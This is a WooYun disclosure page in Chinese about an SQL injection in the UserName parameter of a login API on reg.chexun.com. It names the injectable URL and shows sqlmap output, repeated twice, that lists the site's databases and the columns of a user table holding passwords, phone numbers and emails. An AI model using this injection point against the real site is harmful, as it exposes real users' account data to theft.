当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0166625

漏洞标题:车讯网分站存在一枚SQL注入漏洞

相关厂商:车讯网

漏洞作者: culprit

提交时间:2016-01-02 04:07

修复时间:2016-01-10 09:00

公开时间:2016-01-10 09:00

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-02: 细节已通知厂商并且等待厂商处理中
2016-01-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

漏洞页面:http://reg.chexun.com/API/PHPUCLogin.ashx?UserName=


1.jpg


2.jpg


3.jpg


4.jpg


available databases [21]:
[*] CheBaiKe
[*] DBAiKaZhuaQu
[*] DBCarSite
[*] DBCharacterLibrary
[*] DBComment
[*] DBDealersShop
[*] DBDingYue
[*] DBDoublue11
[*] DBFeedback
[*] DBSMS
[*] DBTuangou
[*] DBUCenter
[*] DBVoting
[*] DBWapNews
[*] distribution
[*] master
[*] model
[*] msdb
[*] ProjectManagement
[*] tempdb
[*] ZhaoCheGameDB
[12:07:52] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\reg.chexun.com'


Database: DBUCenter
[21 tables]
+----------------------------+
| AdminLog                   |
| AdminUser                  |
| Comments_tab               |
| CommonUser                 |
| CommonUserBak20151204      |
| CommonUserProfile          |
| CommonUser_GroupId_UserBak |
| ConcernedType              |
| LoginLog                   |
| OAuth_Client               |
| RegSourceLog               |
| RegSourceType              |
| RegisterConfirm            |
| Replys_tab                 |
| ThreePlatformUserInfo_tab  |
| UserConcerned              |
| UserGroupType              |
| uc_albums                  |
| uc_mycars                  |
| uc_photocomments           |
| uc_photos                  |
+----------------------------+


Database: DBUCenter
Table: CommonUser
[33 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| ActiCode      | nvarchar |
| ActiDate      | datetime |
| ADMIN_ID      | numeric  |
| Answer        | nvarchar |
| BBSUID        | nvarchar |
| BBSUserID     | bigint   |
| DealersID     | bigint   |
| DEPARTMENT_ID | numeric  |
| GROUP_IDS     | nvarchar |
| GroupId       | nvarchar |
| ID            | numeric  |
| IP            | nvarchar |
| LastLoginTime | datetime |
| LOGIN_TIMES   | numeric  |
| ModelID       | bigint   |
| Password      | nvarchar |
| PEN_NAME      | nvarchar |
| Phone         | nvarchar |
| QQOpenID      | nvarchar |
| QQWeiBo       | nvarchar |
| Question      | nvarchar |
| REAL_NAME     | nvarchar |
| Regdate       | nvarchar |
| RegSource     | int      |
| RenRenUserID  | nvarchar |
| SEX           | nchar    |
| SinaUserID    | nvarchar |
| Status        | int      |
| TARGET        | nchar    |
| TEMP          | nvarchar |
| UserEmail     | nvarchar |
| UserId        | bigint   |
| UserName      | nvarchar |
+---------------+----------+


漏洞证明:

漏洞页面:http://reg.chexun.com/API/PHPUCLogin.ashx?UserName=


1.jpg


2.jpg


3.jpg


4.jpg


available databases [21]:
[*] CheBaiKe
[*] DBAiKaZhuaQu
[*] DBCarSite
[*] DBCharacterLibrary
[*] DBComment
[*] DBDealersShop
[*] DBDingYue
[*] DBDoublue11
[*] DBFeedback
[*] DBSMS
[*] DBTuangou
[*] DBUCenter
[*] DBVoting
[*] DBWapNews
[*] distribution
[*] master
[*] model
[*] msdb
[*] ProjectManagement
[*] tempdb
[*] ZhaoCheGameDB
[12:07:52] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\reg.chexun.com'


Database: DBUCenter
[21 tables]
+----------------------------+
| AdminLog                   |
| AdminUser                  |
| Comments_tab               |
| CommonUser                 |
| CommonUserBak20151204      |
| CommonUserProfile          |
| CommonUser_GroupId_UserBak |
| ConcernedType              |
| LoginLog                   |
| OAuth_Client               |
| RegSourceLog               |
| RegSourceType              |
| RegisterConfirm            |
| Replys_tab                 |
| ThreePlatformUserInfo_tab  |
| UserConcerned              |
| UserGroupType              |
| uc_albums                  |
| uc_mycars                  |
| uc_photocomments           |
| uc_photos                  |
+----------------------------+


Database: DBUCenter
Table: CommonUser
[33 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| ActiCode      | nvarchar |
| ActiDate      | datetime |
| ADMIN_ID      | numeric  |
| Answer        | nvarchar |
| BBSUID        | nvarchar |
| BBSUserID     | bigint   |
| DealersID     | bigint   |
| DEPARTMENT_ID | numeric  |
| GROUP_IDS     | nvarchar |
| GroupId       | nvarchar |
| ID            | numeric  |
| IP            | nvarchar |
| LastLoginTime | datetime |
| LOGIN_TIMES   | numeric  |
| ModelID       | bigint   |
| Password      | nvarchar |
| PEN_NAME      | nvarchar |
| Phone         | nvarchar |
| QQOpenID      | nvarchar |
| QQWeiBo       | nvarchar |
| Question      | nvarchar |
| REAL_NAME     | nvarchar |
| Regdate       | nvarchar |
| RegSource     | int      |
| RenRenUserID  | nvarchar |
| SEX           | nchar    |
| SinaUserID    | nvarchar |
| Status        | int      |
| TARGET        | nchar    |
| TEMP          | nvarchar |
| UserEmail     | nvarchar |
| UserId        | bigint   |
| UserName      | nvarchar |
+---------------+----------+


修复方案:

过滤之类吧,你们经验肯定很丰富吧 :)

版权声明:转载请注明来源 culprit@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-10 09:00

厂商回复:

最新状态:

暂无